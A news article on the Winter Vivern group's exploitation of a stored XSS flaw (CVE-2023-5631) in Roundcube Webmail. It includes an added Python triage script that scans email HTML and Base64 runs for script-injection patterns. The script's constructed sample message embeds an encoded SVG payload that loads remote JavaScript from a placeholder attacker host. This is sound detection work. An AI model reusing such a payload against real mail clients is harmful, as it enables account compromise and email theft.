Winter Vivern hackers actively exploit 0-day vulnerability in Roundcube email client

Carding 4 Carders

All a potential victim needs to do is open the email; the attackers take care of the rest.

Cybercriminals operating under the name Winter Vivern were seen exploiting a zero-day vulnerability in the Roundcube Webmail software. The attacks were first recorded on October 11, 2023, and the hackers' goal was to steal emails from the victims' accounts.

ESET researchers who discovered the attack reported that Winter Vivern has resumed its activities. They noted that the group had previously exploited other, already known vulnerabilities in Roundcube and Zimbra.

The Winter Vivern group is also tracked as TA473 and UAC-0114. In recent months it has been linked to attacks against Ukraine and Poland, as well as government organizations across Europe and India.

The new vulnerability described by ESET is tracked as CVE-2023-5631 and carries a CVSS score of 5.4. It is a stored cross-site scripting (XSS) flaw that allows a remote attacker to load arbitrary JavaScript in the victim's browser. The fix was released on October 14, 2023.

Winter Vivern's attack chain starts with a phishing message whose HTML body carries a Base64-encoded payload. When the victim views the message, the payload is decoded and, through the XSS vulnerability, injects JavaScript fetched from a server the attackers control.

Matthieu Faou, an ESET researcher, explained: "By sending a specially crafted email, attackers can load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual actions are required from the user other than viewing the email in a web browser."
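Added example, not code from ESET, Roundcube or the original post: a small triage script for the attack chain described in the two paragraphs above. It parses a raw message, pulls every text/html part, and flags script-injection indicators both in the visible markup and inside long Base64 runs that decode to markup, which is where a payload like the one described would hide. The indicator patterns are this example's own heuristics, and the two sample messages (addresses, hostname `updates.example.invalid`, and the inline payload) are constructed for the demonstration; they are not the real campaign's email.

```python
import base64
import binascii
import re
from email import message_from_bytes, policy

# Heuristic indicators of script injection. These patterns are this example's own,
# not ESET's or Roundcube's detection logic, and will not catch every obfuscation.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "remote_script_src": re.compile(
        r"(?:\.src\s*=|<script[^>]*\bsrc\s*=)\s*['\"]?https?://", re.I
    ),
}

# A run of base64 alphabet long enough to hide markup (shorter runs are mostly ids/tokens).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_b64_runs(text):
    """Yield (blob, decoded_text) for each base64-looking run that decodes to printable text."""
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a long hex string or URL path)
        decoded = raw.decode("utf-8", errors="ignore")
        if not decoded or sum(c.isprintable() for c in decoded) < 0.9 * len(decoded):
            continue  # binary data such as an inline image, not markup
        yield blob, decoded


def scan_html(html):
    """Return findings for one HTML body: indicators seen inline and inside base64 runs."""
    findings = []
    # Check the visible markup with base64 runs removed, so a blob's own characters
    # cannot trigger the text patterns by accident.
    visible = B64_RUN.sub("", html)
    inline_hits = [name for name, rx in INDICATORS.items() if rx.search(visible)]
    if inline_hits:
        findings.append({"where": "inline", "indicators": inline_hits})
    for blob, decoded in decode_b64_runs(html):
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"where": "base64", "indicators": hits, "decoded": decoded[:200]})
    return findings


def scan_eml(raw_bytes):
    """Parse a raw RFC 5322 message and scan every text/html part."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


# --- Constructed sample messages (invented for this example, not the real campaign's mail) ---
_INNER_PAYLOAD = (
    '<svg xmlns="http://www.w3.org/2000/svg"><script>'
    'var s=document.createElement("script");'
    's.src="https://updates.example.invalid/loader.js";'  # placeholder attacker host
    "document.head.appendChild(s);</script></svg>"
)
_HEADERS = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
)
MALICIOUS_EML = (
    _HEADERS + "Subject: Meeting notes\r\n\r\n"
    "<html><body><p>Please see the attached notes.</p>"
    '<img src="data:image/svg+xml;base64,'
    + base64.b64encode(_INNER_PAYLOAD.encode()).decode()
    + '"></body></html>\r\n'
).encode()
BENIGN_EML = (
    _HEADERS + "Subject: Order confirmation\r\n\r\n"
    "<html><body><p>Reference: "
    + base64.b64encode(b"Order 48213 confirmed. No action is needed on your side.").decode()
    + "</p></body></html>\r\n"
).encode()

if __name__ == "__main__":
    for label, eml in (("malicious", MALICIOUS_EML), ("benign", BENIGN_EML)):
        print(label, scan_eml(eml))
```

Run it against an exported .eml from the mail store (`scan_eml(open(path, "rb").read())`) to get a quick list of messages worth a closer look. The benign sample, which also contains a long Base64 run, produces no finding, because the decoded text carries none of the indicators; the malicious sample is flagged only through its decoded blob, which is exactly the case a grep for `<script` on the raw source misses.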

"Despite the low complexity of the group's tools, it poses a threat to European governments because of its persistence and regular launch of phishing campaigns," Faou said.